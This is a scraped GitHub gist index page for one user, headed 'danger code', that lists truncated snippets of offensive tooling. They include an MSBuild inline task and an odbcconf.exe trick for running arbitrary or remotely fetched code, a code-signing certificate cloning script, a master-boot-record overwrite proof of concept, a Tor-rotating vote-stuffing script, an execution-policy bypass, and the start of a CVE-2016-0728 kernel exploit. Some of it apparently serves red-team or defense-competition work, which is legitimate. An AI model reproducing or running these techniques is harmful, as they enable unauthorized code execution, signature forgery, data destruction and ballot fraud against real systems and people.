👾
danger code

Dan Borges ahhh

@ahhh
ahhh / msbuild.xml
Created December 26, 2017 17:09 — forked from Arno0x/msbuild.xml
MSBuild project definition to execute arbitrary code from msbuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@ahhh
ahhh / odbcconf.cs
Created December 26, 2017 17:09 — forked from Arno0x/odbcconf.cs
Download and execute arbitrary code with odbcconf.exe
/*
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/
using System;
# Technique taken from: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
# Remember to set your target file path to $SignThis!!
# Example: $SignThis = "C:\Users\user\Desktop\runme.exe"; Cert-Clone.ps1;
# Setup Cert Store in Reg
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
# Setup Cert Store on Disk
[system.io.directory]::CreateDirectory("C:\CertStore")
# Download Root Cert
@ahhh
ahhh / keybase.md
Created October 27, 2017 19:53
keybase.md

Keybase proof

I hereby claim:

  • I am ahhh on github.
  • I am ahhh (https://keybase.io/ahhh) on keybase.
  • I have a public key whose fingerprint is 9DAC 1893 691E 8213 7040 FBCB 542C 4EE7 1926 BAE2

To claim this, I am signing this object:

@ahhh
ahhh / Get-ScreenShot.ps1
Last active November 1, 2016 20:11 — forked from guitarrapc/Get-ScreenShot.ps1
Screenshot Automation with PowerShell
function Get-ScreenShot
{
[CmdletBinding()]
param(
[parameter(Mandatory = 0)]
[ValidateNotNullOrEmpty()]
[Alias('Path', 'Out', 'o')]
[string]$OutPath = "$env:USERPROFILE\Documents\ScreenShot",
#screenshot_[yyyyMMdd_HHmmss_ffff].png
@ahhh
ahhh / stomp-mbr.ps1
Last active December 23, 2020 07:28
function Set-MasterBootRecord
{
<#
.SYNOPSIS
Proof of concept code that overwrites the master boot record with the
message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
Adopted by: Ahhh (for CCDC)
License: BSD 3-Clause
@ahhh
ahhh / SirVotesAlot.sh
Created February 17, 2016 23:06
shell script for getting new IPs through TOR and hitting an endpoint with these IPs
#!/bin/bash
votecounter=0
derp="init_value"
count=0
while true; do
derp=$"init_value"
derp=$(curl -s --socks5-hostname localhost:9050 http://www.imdb.com/name/nm0000206/ | grep -o "Keanu Reeves")
@ahhh
ahhh / Enable_Scripting.ps1
Created February 16, 2016 05:38
Enable running any PowerShell scripts, normally / default they are restricted
#powershell -ExecutionPolicy ByPass -File ./example.ps1
Set-ExecutionPolicy Unrestricted
Get-ChildItem -Recurse -filter *.exe C:\Windows\ 2> $null |
ForEach-Object { Write-Host -foregroundcolor "green" "Scanning"$_.FullName $_.Name; ./yara32.exe -d filename=$_.Name your_rule.yar $_.FullName 2> $null }
@ahhh
ahhh / cve_2016_0728.c
Created January 19, 2016 18:22 — forked from PerceptionPointTeam/cve_2016_0728.c
cve_2016_0728 exploit
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_0728 PP_KEY */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>